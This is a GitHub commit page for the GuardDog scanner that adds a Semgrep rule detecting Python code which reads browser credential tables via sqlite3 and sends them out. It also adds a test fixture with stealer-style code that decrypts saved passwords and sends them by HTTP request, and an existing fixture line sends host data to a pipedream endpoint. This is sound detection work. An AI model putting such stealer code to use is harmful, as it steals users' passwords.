Skip to content

Commit

Permalink
Add detection for Python sqlite3 data exfiltration (#420)
Browse files Browse the repository at this point in the history
* Add Python sqlite3 data exfiltration rule coverage

* Incorporate change requests

* Match only on targeted table names
  • Loading branch information
ikretz authored Jul 19, 2024
1 parent 104e883 commit 8545867
Show file tree
Hide file tree
Showing 2 changed files with 35 additions and 0 deletions.
12 changes: 12 additions & 0 deletions guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
Original file line number Diff line number Diff line change
Expand Up @@ -31,6 +31,18 @@ rules:
- metavariable-regex:
metavariable: $ENVVAR
regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
- patterns:
- pattern-inside: |
$CONNECT = sqlite3.connect(...)
...
$CURSOR = $CONNECT.cursor(...)
...
- pattern: $CURSOR.execute($QUERY, ...)
- metavariable-pattern:
metavariable: $QUERY
patterns:
- pattern: "..."
- pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
pattern-sinks:
- pattern-either:
- pattern-inside: requests.$METHOD(...)
Expand Down
23 changes: 23 additions & 0 deletions tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
Original file line number Diff line number Diff line change
Expand Up @@ -226,3 +226,26 @@ def run(self):
ploads = {'hostname':hostname,'cwd':cwd,'username':username}
# ruleid: exfiltrate-sensitive-data
requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)


""" RULEID: sqlite3 data exfiltration
"""

def steal_passwords2(self, name: str, path: str, profile: str):
path = "path"
if not os.path.isfile(path):
return
loginvault = self.random_dir_create()
copy2(path, loginvault)
conn = sqlite3.connect(loginvault)
cursor = conn.cursor()
with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
url, username, password = res
password = self.dcrpt_val(password, self.masterkey)
if url != "":
params = {'url': url, 'username': username, 'password': password}
# ruleid: exfiltrate-sensitive-data
requests.get("https://example.com", params=params)
cursor.close()
conn.close()

0 comments on commit 8545867

Please sign in to comment.